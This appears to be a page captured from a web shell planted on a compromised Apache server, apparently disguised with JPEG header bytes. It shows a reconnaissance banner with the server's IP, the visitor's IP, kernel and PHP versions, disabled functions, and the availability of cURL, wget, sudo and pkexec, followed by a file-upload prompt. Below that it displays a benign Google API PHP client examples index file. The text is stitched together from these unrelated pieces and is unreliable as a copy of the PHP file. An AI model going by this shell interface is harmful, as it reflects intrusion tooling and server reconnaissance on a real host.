????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.227 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/icad.astacus.se/google/vendor/google/apiclient/examples/ |
Upload File : |
<?php include_once "templates/base.php"; if (!isWebRequest()) { echo "To view this page on a webserver using PHP 5.4 or above run: \n\t php -S localhost:8080\n"; exit(); } echo pageHeader("PHP Library Examples"); ?> <ul> <li><a href="simple-query.php">A query using simple API access</a></li> <li><a href="user-example.php">A query for user data, using OAuth 2.0 authentication.</a></li> <li><a href="batch.php">An example of combining multiple calls into a batch request</a></li> <li><a href="service-account.php">A query using the service account functionality.</a></li> <li><a href="simplefileupload.php">An example of a small file upload.</a></li> <li><a href="fileupload.php">An example of a large file upload.</a></li> <li><a href="idtoken.php">An example of verifying and retrieving the id token.</a></li> <li><a href="multi-api.php">An example of using multiple APIs.</a></li> </ul> <?php echo pageFooter();